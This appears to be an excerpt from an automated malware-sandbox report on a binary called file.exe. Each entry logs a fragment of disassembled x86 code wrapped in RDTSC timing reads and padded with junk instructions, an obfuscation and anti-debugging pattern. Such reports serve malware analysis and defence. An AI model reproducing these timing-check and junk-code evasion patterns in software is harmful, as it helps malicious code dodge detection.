Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742A0F second address: 742A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007FEFB8B6DE58h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov edx, 1330B8D5h 0x00000026 push 00000000h 0x00000028 jnc 00007FEFB8B6DE5Bh 0x0000002e push B468F1D8h 0x00000033 jl 00007FEFB8B6DE5Ah 0x00000039 push edi 0x0000003a push esi 0x0000003b pop esi 0x0000003c pop edi 0x0000003d add dword ptr [esp], 4B970EA8h 0x00000044 mov dword ptr [ebp+122D2055h], edx 0x0000004a push 00000003h 0x0000004c mov di, 6332h 0x00000050 push 00000000h 0x00000052 clc 0x00000053 jp 00007FEFB8B6DE5Bh 0x00000059 push edx 0x0000005a movzx esi, dx 0x0000005d pop edi 0x0000005e push 00000003h 0x00000060 sub dword ptr [ebp+1244FA9Eh], ebx 0x00000066 mov edx, eax 0x00000068 call 00007FEFB8B6DE59h 0x0000006d pushad 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742A90 second address: 742ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEFB9679B56h 0x0000000a popad 0x0000000b jmp 00007FEFB9679B66h 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007FEFB9679B5Dh 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pop edx 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742ACA second address: 742ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEFB8B6DE5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742ADB second address: 742AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b ja 00007FEFB9679B58h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742AF8 second address: 742AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742AFF second address: 742B04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742B04 second address: 742B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEFB8B6DE68h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d and cx, B991h 0x00000012 lea ebx, dword ptr [ebp+124546E7h] 0x00000018 push ebx 0x00000019 movzx esi, di 0x0000001c pop edi 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FEFB8B6DE67h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jno 00007FEFB8B6DE5Ch 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742BC5 second address: 742BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEFB9679B62h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742BEE second address: 742C23 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEFB8B6DE69h 0x00000008 jmp 00007FEFB8B6DE63h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FEFB8B6DE5Dh 0x00000018 mov eax, dword ptr [eax] 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742C23 second address: 742C4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FEFB9679B6Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742C4E second address: 742CCE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEFB8B6DE5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b or esi, dword ptr [ebp+122D299Ah] 0x00000011 push 00000003h 0x00000013 sub dword ptr [ebp+122D3684h], ebx 0x00000019 push 00000000h 0x0000001b or dword ptr [ebp+122D3231h], eax 0x00000021 push 00000003h 0x00000023 push 9B016911h 0x00000028 push eax 0x00000029 jmp 00007FEFB8B6DE60h 0x0000002e pop eax 0x0000002f xor dword ptr [esp], 5B016911h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FEFB8B6DE58h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 lea ebx, dword ptr [ebp+124546F2h] 0x00000056 jo 00007FEFB8B6DE5Ch 0x0000005c mov edi, dword ptr [ebp+122D29CAh] 0x00000062 push eax 0x00000063 push esi 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 721FEB second address: 721FFB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEFB9679B56h 0x00000008 jno 00007FEFB9679B56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 721FFB second address: 722001 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 722001 second address: 722005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 722005 second address: 722009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 722009 second address: 722037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FEFB9679B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007FEFB9679B56h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 ja 00007FEFB9679B56h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push ebx 0x00000021 pushad 0x00000022 jnp 00007FEFB9679B56h 0x00000028 push eax 0x00000029 pop eax 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76212B second address: 762143 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEFB8B6DE5Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jo 00007FEFB8B6DE56h 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7622AE second address: 7622C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEFB9679B56h 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007FEFB9679B56h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7622C5 second address: 7622E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEFB8B6DE66h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FEFB8B6DE5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7625CC second address: 7625D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7628B8 second address: 7628D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7628D7 second address: 7628E1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEFB9679B56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762A22 second address: 762A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jl 00007FEFB8B6DE58h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jc 00007FEFB8B6DE58h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 jnp 00007FEFB8B6DE8Ah 0x0000001e push eax 0x0000001f push edx 0x00000020 je 00007FEFB8B6DE56h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762A48 second address: 762A6F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEFB9679B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FEFB9679B5Ah 0x00000010 jmp 00007FEFB9679B60h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763612 second address: 763627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEFB8B6DE61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763627 second address: 763662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FEFB9679B6Eh 0x0000000e jmp 00007FEFB9679B68h 0x00000013 jg 00007FEFB9679B78h 0x00000019 pushad 0x0000001a jmp 00007FEFB9679B5Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763662 second address: 763668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767A50 second address: 767A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767A56 second address: 767A80 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEFB8B6DE56h 0x00000008 jmp 00007FEFB8B6DE60h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FEFB8B6DE60h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767A80 second address: 767A9D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FEFB9679B56h 0x00000009 jmp 00007FEFB9679B5Bh 0x0000000e pop esi 0x0000000f jo 00007FEFB9679B5Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7256ED second address: 725706 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FEFB8B6DE61h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 725706 second address: 72570C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72570C second address: 725710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 769B40 second address: 769B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A026 second address: 76A02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A2C6 second address: 76A2CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A2CC second address: 76A2EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FEFB8B6DE56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A47C second address: 76A482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E9CE second address: 76E9E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72DCE5 second address: 72DD05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72DD05 second address: 72DD13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEFB8B6DE56h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72DD13 second address: 72DD1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76DE92 second address: 76DE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76DFFC second address: 76E007 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E007 second address: 76E00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E00C second address: 76E018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FEFB9679B56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E018 second address: 76E01C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E16F second address: 76E183 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FEFB9679B56h 0x0000000e jnp 00007FEFB9679B56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E6A0 second address: 76E6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FEFB8B6DE60h 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E833 second address: 76E842 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 774180 second address: 77419A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEFB8B6DE66h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77419A second address: 7741AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jnl 00007FEFB9679B56h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7741AD second address: 7741B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 774226 second address: 774249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEFB9679B66h 0x0000000b popad 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77570A second address: 77570E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77570E second address: 77571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 775FA9 second address: 775FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776FE1 second address: 776FE6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 778A81 second address: 778A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 778A87 second address: 778B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c js 00007FEFB9679B59h 0x00000012 movzx esi, dx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FEFB9679B58h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 jmp 00007FEFB9679B5Ah 0x00000036 push edx 0x00000037 jnl 00007FEFB9679B5Ch 0x0000003d pop esi 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007FEFB9679B58h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000014h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a jmp 00007FEFB9679B60h 0x0000005f xchg eax, ebx 0x00000060 jo 00007FEFB9679B6Dh 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FEFB9679B5Bh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 778B22 second address: 778B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 778B26 second address: 778B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FEFB9679B5Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 778B3B second address: 778B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FEFB8B6DE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779622 second address: 77962E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723B67 second address: 723B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779F76 second address: 779F8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007FEFB9679B56h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723B6B second address: 723B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723B77 second address: 723B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723B7D second address: 723BA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FEFB8B6DE5Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77D65C second address: 77D664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 736498 second address: 7364A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FEFB8B6DE56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7364A6 second address: 7364C9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEFB9679B56h 0x00000008 jns 00007FEFB9679B56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jng 00007FEFB9679B56h 0x0000001a pop ecx 0x0000001b jc 00007FEFB9679B58h 0x00000021 push eax 0x00000022 pop eax 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7364C9 second address: 7364D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEFB8B6DE5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77E8D3 second address: 77E90C instructions: 0x00000000 rdtsc 0x00000002 je 00007FEFB9679B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c movzx edi, cx 0x0000000f push 00000000h 0x00000011 jno 00007FEFB9679B59h 0x00000017 push 00000000h 0x00000019 jc 00007FEFB9679B5Ch 0x0000001f mov edi, dword ptr [ebp+122D1D66h] 0x00000025 xchg eax, esi 0x00000026 ja 00007FEFB9679B5Ah 0x0000002c push eax 0x0000002d push esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77E90C second address: 77E910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7829DA second address: 7829F7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEFB9679B5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jg 00007FEFB9679B56h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781B46 second address: 781B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 782B49 second address: 782B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783941 second address: 783951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FEFB8B6DE56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 782B52 second address: 782B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
